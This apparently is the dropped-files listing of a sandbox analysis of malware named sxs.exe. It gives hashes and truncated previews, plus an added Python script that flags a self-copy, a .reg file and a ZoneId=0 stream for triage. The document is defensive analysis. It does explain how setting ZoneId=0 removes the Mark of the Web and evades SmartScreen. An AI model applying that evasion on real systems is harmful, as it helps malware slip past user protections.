                                                                          Preview:L..................F.@.. ...$+.,.......%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2681
                                                                          Entropy (8bit):3.979272445959386
                                                                          Encrypted:false
                                                                          SSDEEP:48:87dtT1tJwHRidAKZdA1hehBiZUk1W1qehHy+C:8X/JD9ny
                                                                          MD5:570361B67511423D389A45EA82AE23F3
                                                                          SHA1:7817798EB4F5CED15AC53E38593AA03F4C23CE60
                                                                          SHA-256:3957007E031AEB174B34A9E2C8045D71BC4300EF783B00E27496726656B973BD
                                                                          SHA-512:B9BAACF234BAB92B4EB38CA03A1F324B483B761404C64202115C1E8C4E45AB002EB63C9EF5E54E6F1C8E61980A16DAEC445CC6B6536BFE65F5430E5066B07D7E
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,......$.%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2683
                                                                          Entropy (8bit):3.9888246330638806
                                                                          Encrypted:false
                                                                          SSDEEP:48:8HfdtT1tJwHRidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:8Hr/JzT/TbxWOvTbxy7T
                                                                          MD5:DBE90D8D4875A812EC2619C38FC4A593
                                                                          SHA1:C9E6540057EF478B478A427D9A3A2C0CEEAE33F6
                                                                          SHA-256:3E82F3D5155512BE88B8C430C4C5B633A3947163EA60F63C6895C1BE2B0E79BA
                                                                          SHA-512:09E1D313FFCF7EBFED8AD01049885032D858116E524B71E5626806F4D599999E8993B2DFCDA2491AC03D62DB850050552AE4223A980E80D5ADC20CEF18AB348B
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,.......%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Users\user\Desktop\sxs.exe
                                                                          File Type:Windows Registry text (Win95 or above)
                                                                          Category:modified
                                                                          Size (bytes):10
                                                                          Entropy (8bit):3.121928094887362
                                                                          Encrypted:false
                                                                          SSDEEP:3:0QOvn:bOvn
                                                                          MD5:C756B8EAC93DE58D57105A6C35ADB50F
                                                                          SHA1:B18D370DABC3C5B9E82D74F19BBC101A1BE009F2
                                                                          SHA-256:853448E59C9BB7599FA8A5FF03A0B608781A02D41F58576F1192E0C48CB8D635
                                                                          SHA-512:09FBFE4A17B1FB6167C6889E5A0AB41CFEF9E1372796E69C2558A50A002D9C1E2B0D81D45D7F96BE9D02A8025D0AE276ECC01F135E9CCB04C301ADCFFD67D263
                                                                          Malicious:true
                                                                          Preview:REGEDIT4..
                                                                          Process:C:\Users\user\Desktop\sxs.exe
                                                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):55448
                                                                          Entropy (8bit):7.763459210430956
                                                                          Encrypted:false
                                                                          SSDEEP:1536:8BZMeVfnEM+jlv4mXwLX3Pb29jb0Y+YUjL3IVokJ3:8jMsfnEMmqEUfiNb0YA3OF
                                                                          MD5:4F89E3A88853265154E24969581FB45A
                                                                          SHA1:D5AE12CFE50AC91702DA2CCD4E21321EF256EA2A
                                                                          SHA-256:EE77A17F0C1FF00FB7EB9A453EC22BB63AE382256211B6AA5DB67C48E52FED73
                                                                          SHA-512:A5A8CD57D6158113552D345DBAAEC41175C45BD8A6D1558F0FA4C0B7596C32630E1F5C9F0824AA856467FF06BDB4013F486402CAB085E67D87536F8AF7DD0EBA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 91%
                                                                          Preview:MZ..........PE..L........................~........................@..........................p...................@...........................S..(...........................................................VT......................................................es2z0....p..............................es2z1...............................`...es2z2........`..:...................`...:....S......u..S..$...t-.....H.....S.;C.s....s....w.AA....V..+..^.^...P.S....@x.u..c.PU.S....3.A......r....u...F...KERNEL32.dll...L...p..Y.......................................................+...........................6.......CT..!T..4T...............# ..&.T......2@..2@..2@..2@..2@..2@..2@..2@..2@..2@.......@.. .H.... .T.$.D. .D@!.D. .@...D. .....D. 2@...D. ...$.D. .P. .D. .....D. 6P.#.D.....".P."...".@................. .........P.$...............................T.....(&..@u.....?3...3.N.3...3.(.3.Y.3...3.;.3.d.3...3..."BY.._.h..S.6......G....X..Ge.T....G...3\s.G..3.r/.GS......G...y>..G..../..G..~..G...
                                                                          Process:C:\Users\user\Desktop\sxs.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0
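Three of the entries above come from the sample itself rather than from Chrome and are the ones worth a second look: a 10-byte "REGEDIT4" file (a .reg header, matching the "Uses regedit.exe to modify the Windows registry" signature), a PE32 whose MD5/SHA1/SHA-256 are identical to the submitted sxs.exe (an exact self-copy, dropped to the Windows directory per the signature list), and a 26-byte Zone.Identifier stream reading "[ZoneTransfer] ZoneId=0". ZoneId 0 is URLZONE_LOCAL_MACHINE; a file carrying that stream has no Mark of the Web, so SmartScreen and the attachment-execution checks that key on ZoneId 3 or 4 treat it as local. The script below is an added example, not part of the Joe Sandbox report or its tooling; it parses the flat key:value layout of these entries (a new entry begins at each "Process:" line) and flags those three conditions. The input is constructed from values on this page with previews shortened, and the sample hash is taken from the report's General Information section.

```python
import re

# SHA-256 of the submitted sample, from the report's General Information section.
SAMPLE_SHA256 = "ee77a17f0c1ff00fb7eb9a453ec22bb63ae382256211b6aa5db67c48e52fed73"

# URLZONE values as written in a Zone.Identifier stream. Only 3 and 4 carry
# Mark of the Web; 0 means the file is treated as if it were created locally.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}

# Constructed input: a subset of the dropped-file entries on this page, with
# the Preview values shortened. Only the keys read below matter to the logic.
REPORT_ENTRIES = """\
Process:C:\\Users\\user\\Desktop\\sxs.exe
File Type:Windows Registry text (Win95 or above)
Category:modified
Size (bytes):10
SHA-256:853448E59C9BB7599FA8A5FF03A0B608781A02D41F58576F1192E0C48CB8D635
Malicious:true
Preview:REGEDIT4..
Process:C:\\Users\\user\\Desktop\\sxs.exe
File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):55448
SHA-256:EE77A17F0C1FF00FB7EB9A453EC22BB63AE382256211B6AA5DB67C48E52FED73
Malicious:true
Preview:MZ..........PE..L...
Process:C:\\Users\\user\\Desktop\\sxs.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):985
SHA-256:BFC14308A86D3214A6214644DF3585D6003CBF0C89B14D87C70C0576C183494F
Malicious:false
Preview:{"system":"SN",...}
"""


def parse_entries(text):
    """Split the flat key:value listing into one dict per dropped file.

    The report starts every entry with a 'Process:' line, so that key is
    used as the record separator. Values may themselves contain ':' (Windows
    paths, JSON previews), so only the first colon is treated as the delimiter.
    """
    entries, current = [], None
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "Process":
            current = {}
            entries.append(current)
        if current is not None:
            current[key] = value
    return entries


def triage(entries, sample_sha256):
    """Return (kind, process, detail) for each entry matching one of three
    conditions: an exact self-copy of the submitted sample, a Zone.Identifier
    stream whose ZoneId is below 3 (no Mark of the Web), or a .reg import file.
    """
    findings = []
    for entry in entries:
        process = entry.get("Process", "")
        sha256 = entry.get("SHA-256", "").lower()
        preview = entry.get("Preview", "")
        file_type = entry.get("File Type", "")

        if sha256 and sha256 == sample_sha256.lower():
            findings.append(("self-copy", process, f"SHA-256 {sha256}"))

        if preview.startswith("[ZoneTransfer]"):
            # The report renders the CRLF bytes as dots; the regex does not
            # depend on them, so it works on a raw stream as well.
            match = re.search(r"ZoneId=(\d)", preview)
            zone = int(match.group(1)) if match else None
            if zone is not None and zone < 3:
                name = ZONE_NAMES.get(zone, "unknown")
                findings.append(("zone-identifier-no-motw", process,
                                 f"ZoneId={zone} ({name})"))

        if preview.startswith("REGEDIT4") or "Windows Registry text" in file_type:
            findings.append(("reg-import-file", process, file_type))
    return findings


if __name__ == "__main__":
    for kind, process, detail in triage(parse_entries(REPORT_ENTRIES), SAMPLE_SHA256):
        print(f"{kind:24} {process}  {detail}")
```

On the page's own data this yields three findings, all attributed to C:\Users\user\Desktop\sxs.exe, and nothing for the Chrome-dropped JSON. The self-copy check compares SHA-256 only; since the MD5 and SHA1 on the page match the sample as well, the PE32 entry is a byte-identical copy rather than a repacked variant, which is what makes a single hash sufficient here.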
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65465)
                                                                          Category:dropped
                                                                          Size (bytes):691127
                                                                          Entropy (8bit):5.6159903673455736
                                                                          Encrypted:false
                                                                          SSDEEP:12288:Asb1QYnTxQYnT9DUk4f0WTI4WugqciqXDEu4Om4+BcWu2:A01QYnTxQYnTF4OH6
                                                                          MD5:35DF29B922F485757F6253377D2300F4
                                                                          SHA1:E579DF30408E9EE6670F9EFC3D8CA9AF4DF04D3E
                                                                          SHA-256:83DA041AD32EE87CB3FC0938C24D77625B66C109D0124A51047518D80D89422E
                                                                          SHA-512:4E8C780A286A1D81DDE2AA3D8126DEAFD0CD5ACC94F3BF75FCD548C98061FB4DD887D4007A6C6630CDD04CB0DAE3E288A4CE4195F5946B201DAFF68A476A2869
                                                                          Malicious:false
                                                                          Preview:/*! For license information please see main.5bbf83b7.js.LICENSE.txt */.(()=>{var e={8665:e=>{"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}e.exports=function(){for(var e,n,r=[],o=window,i=o;i;){try{if(i.frames.__tcfapiLocator){e=i;break}}catch(e){}if(i===o.top)break;i=i.parent}e||(function e(){var t=o.document,n=!!o.frames.__tcfapiLocator;if(!n)if(t.body){var r=t.createElement("iframe");r.style.cssText="display:none",r.name="__tcfapiLocator",t.body.appendChild(r)}else setTimeout(e,5);return!n}(),o.__tcfapi=function(){for(var e=arguments.length,t=new Array(e),o=0;o<e;o++)t[o]=arguments[o];if(!t.length)return r;"setGdprApplies"===t[0]?t.length>3&&2===parseInt(t[1],10)&&"boolean"==typeof t[3]&&(n=t[3],"function"==typeof t[2]&&t[2]("set",!0)):"ping"===t[0]?"function"==typeof t[2]&&t[2]({gdprApplie
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):380
                                                                          Entropy (8bit):5.443905989268889
                                                                          Encrypted:false
                                                                          SSDEEP:6:xWzPNvUBUQ8UQObhINV2HSuPTv7M+dFNh8UQ8UQOb+Gp/p2HSuPTvAen:xW+raObmNZgv7Hv8aObr1gv7n
                                                                          MD5:5FCDE125FDFD7F8267E3DDD9F09C5755
                                                                          SHA1:B03A86045E3B4C43B85BA50C4978EEB2B663FABE
                                                                          SHA-256:62D815789708300C1583DB95EBAA24775CF225C3A2A3CF649D8188B8E163BCC0
                                                                          SHA-512:C157D565CCAF3C8CB0C8739DBDFD2B0B268E0E7DE9794B2A4902F9EB0D2CB6EC3248E2ECD5B0C462792B0EEBDDDE47DE68C21E6B88359F6FE84AF4314A588B61
                                                                          Malicious:false
                                                                          URL:https://partner.googleadservices.com/gampad/cookie.js?domain=www.onefordvd.com&client=dp-namemedia06_3ph&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2
                                                                          Preview:__sasCookie({"_cookies_":[{"_value_":"ID=01f7242aff40d341:T=1724944342:RT=1724944342:S=ALNI_MYqfL9NHYRt19JVhWCtetlof-oSxw","_expires_":1758640342,"_path_":"/","_domain_":"onefordvd.com","_version_":1},{"_value_":"UID=00000eac5bf6050a:T=1724944342:RT=1724944342:S=ALNI_MZxlzR5DrwrWzN86zdZezrNOkx_Cg","_expires_":1758640342,"_path_":"/","_domain_":"onefordvd.com","_version_":2}]});
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
                                                                          Category:downloaded
                                                                          Size (bytes):1078
                                                                          Entropy (8bit):1.240940859118772
                                                                          Encrypted:false
                                                                          SSDEEP:3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
                                                                          MD5:4123CE1E1732F202F60292941FF1487D
                                                                          SHA1:9F12B11BDE582DAE37CE8C160537D919C561C464
                                                                          SHA-256:D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
                                                                          SHA-512:11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
                                                                          Malicious:false
                                                                          URL:https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250
                                                                          Preview:..............(...&... ..........N...(....... ...............................................................................................................................................................................................................................................................................................(... ...@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):985
                                                                          Entropy (8bit):5.283404361019129
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yel+TLOwoeH6fvTdm1mh9dVbc8EDzzfXaHo4JT:YegLpafxwmPctzyHbJT
                                                                          MD5:ED926A671F1BC370EC439DEB622B92DE
                                                                          SHA1:B3A48748B11D47F0E71CFDF738EF4E0AD3A4866E
                                                                          SHA-256:BFC14308A86D3214A6214644DF3585D6003CBF0C89B14D87C70C0576C183494F
                                                                          SHA-512:441B9A4D57D8A6BFD00769FB436FF1738D4A8BB6B42316CAB750823F8F078F30BF1978871351658A648FF496297E936E9F87B01F06B8BA4F2F61A593CA8352FD
                                                                          Malicious:false
                                                                          Preview:{"system":"SN","account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","customerId":"00000000-0000-0000-0000-000000000000","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-2412708874333548","channel":"06902","pubId":"dp-namemedia06_3ph"},"domain":{"rootDomain":"onefordvd.com","expiresAt":"","status":{"internal":"ACTIVE"},"isAdult":false,"hasAuction":false},"lander":{"template":"ARROW_3","domainDisplayName":"onefordvd.com","headerText":"","footerText":"","headerHtml":"","footerHtml":"","banner":{"show":true,"text":"onefordvd.com may be for sale!","link":"http://domainretailing.com/rg-dsale3p.php?d=onefordvd.com\u0026doe=YWNtZWJpbGxpbmdjb0BnbWFpbC5jb20%3D\u0026dil=SW5xdWlyZSBhYm91dA%3D%3D\u0026ct=teMjLe7_S","type":"AFTERNIC"},"i18n":true,"showDomain":true},"experiment":{"experiment":"parking_cp_ab_01","cohort":"on","start":"","end":"","enabled":true,"data":{"targetCustomerIds":["7dbc6047-87b6-4724-9c84-1e076f5b7c3d"],"useSerpForAdsenseFail":true}}}.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1618)
                                                                          Category:dropped
                                                                          Size (bytes):153696
                                                                          Entropy (8bit):5.543853269836751
                                                                          Encrypted:false
                                                                          SSDEEP:1536:YX/xbg4DuPemooPy7WnHPh4a2EwG19OxHRdjhJBjDSc4Y52kovgwlZXqjzsZ1Dsb:H59cjhJB7wkeesZtpmqc+VHu
                                                                          MD5:ECADDCD9B000B9C725F38827541E0824
                                                                          SHA1:2AA04AE1B0E9FADB01CAEAE4B35A44ECE21B9F96
                                                                          SHA-256:82DDD046F3EE9BF0AD9F0820D9BDCAD6AA783EC0C30CD7E2E1BB50790CB0F17D
                                                                          SHA-512:C973CB6448C479AF62D8526ABF10D89C0F69309D58D5894D052348AEC88E796707E12252A63DD627AB6E3AF2BB0A14A71C9A0C34A077D679D65B2554855DB8F2
                                                                          Malicious:false
                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,17301439,17301442,17301511,17301516,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog"}};var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca=typeof Object
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (3809)
                                                                          Category:downloaded
                                                                          Size (bytes):3854
                                                                          Entropy (8bit):5.080165020112225
                                                                          Encrypted:false
                                                                          SSDEEP:96:Jw8mbMy5F7ZBibyxb6LmPSL5wpD8LtPHAC:OF7ZrSZoAPH9
                                                                          MD5:3F821ADA778691E677AEF2CEA8C4B4F6
                                                                          SHA1:643E7B729B25C2F800469623191DC837798E9D50
                                                                          SHA-256:7510035D553A99FBF93EB67737B2DF057CE096FA1ED7AAD83CFD559E11F2320D
                                                                          SHA-512:8993A8AD28ED4035A022D1B7274C77A97B8235B2DDCD5E6D29F7230D375851539900D4ACE652C94C4BE8A8284FFD86501DF420385A6E680DF4222C162DEFF4D5
                                                                          Malicious:false
                                                                          URL:https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css
                                                                          Preview:.Banner_banner__G1ca3{margin-bottom:5%}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-wrapper{box-shadow:none;box-sizing:border-box;height:100%;margin:0;max-width:100%;padding-top:1rem}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-wrapper>*{margin:auto;max-width:40rem}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-background{background-color:#0000!important}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-container{background-color:#fff;border-left:1px solid #e0e0e0;border-radius:15px 15px 0 0;border-right:1px solid #e0e0e0;border-top:1px solid #e0e0e0;box-sizing:border-box;display:flex;flex-direction:column;padding:1rem}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-container .banner-details-container{margin:0}.trustArc_parkingTrustArcBanner__Ijwo0 .trustarc-banner-container .banner-details-container .description-group{display:flex;flex-direction:row;gap:1rem}@media screen and (max-width:640px){.trustArc_parkingTrustArcBanner__Ijwo0 .trustar
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1618)
                                                                          Category:downloaded
                                                                          Size (bytes):153696
                                                                          Entropy (8bit):5.5438379292863225
                                                                          Encrypted:false
                                                                          SSDEEP:1536:XX/xbg4DuPemooPy7WnHPh4a2EwG19OxHRdjhJBjDSc4Y52kovgwlZXqjzsZ1Dsb:U59cjhJB7wkeesZtpmqc+VHu
                                                                          MD5:A11EDECA56234DE36AE278182D0917F5
                                                                          SHA1:60D000671F16B5AAC086BF720046B1EEE20511F9
                                                                          SHA-256:5FD81BDB36C36D241EC24043F54BBC996ABDDA9FE03DC81FE6F3157F0CBA22D0
                                                                          SHA-512:554E8F3D6532C8CE894ADF4A6C215223F851D188E78654E56A45F9DC5AAE4D3F4B111897510CBB0C4EC083313697F35C34E8F250D091DA3873031C99F63E09D8
                                                                          Malicious:false
                                                                          URL:https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true
                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301431,17301433,17301436,17301511,17301516,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog"}};var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca=typeof Object
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):200
                                                                          Entropy (8bit):5.032268383518208
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WCCD/TSLvDmJS4RKb5sAR+hHiATcvXjXRHRcBHoNcH4VNX1X3MHq09e+HjdFsH:t6q+mc4slhohC/vmI4SmK0xhFELE47zF
                                                                          MD5:CDA1EC3580305080544D05765D14B5D5
                                                                          SHA1:49E3B7057B2A02843876BD4BA2D12629C53766C5
                                                                          SHA-256:81C042CDE00D76A79AEB2C402BF93BD34E31B3A0061D484519052E094686C75D
                                                                          SHA-512:FFEC368162234B6BBEF9791AA24013D256EB8660EDE3AB5A30225F91B6948710BA20A28C16213841494AEE550BE3B0095F8EF4A9F61B749EA61112C17CC5300B
                                                                          Malicious:false
                                                                          URL:https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21
                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1618)
                                                                          Category:downloaded
                                                                          Size (bytes):153721
                                                                          Entropy (8bit):5.54403537987035
                                                                          Encrypted:false
                                                                          SSDEEP:1536:XX/xbg4DuPemooPy7WnHPh4a2EwG19OxHRdjhJBjDSc4Y52kovgwlZXqjzsZ1Dsb:U59cjhJB7wkeesZtpmqc+VHu
                                                                          MD5:E1F8276A887B73D583AC4F09908F7B37
                                                                          SHA1:43B923E86952BFC2BFEFA40365B925C32C4AEE82
                                                                          SHA-256:B40336B0B46D7B2EDE4F6F1539AD85E8C8A7A6DE5B4F184EA941F3D2D5FA7069
                                                                          SHA-512:3F20B5D590420E8C469D9EE4761524F00E820BE8773942379019607E8E9280FDEC38BCBF4BDD6BB9D1EF509BFA71FE4B973AA9C6709F303D1AC51D22418843F1
                                                                          Malicious:false
                                                                          URL:https://syndicatedsearch.goog/adsense/domains/caf.js?pac=0
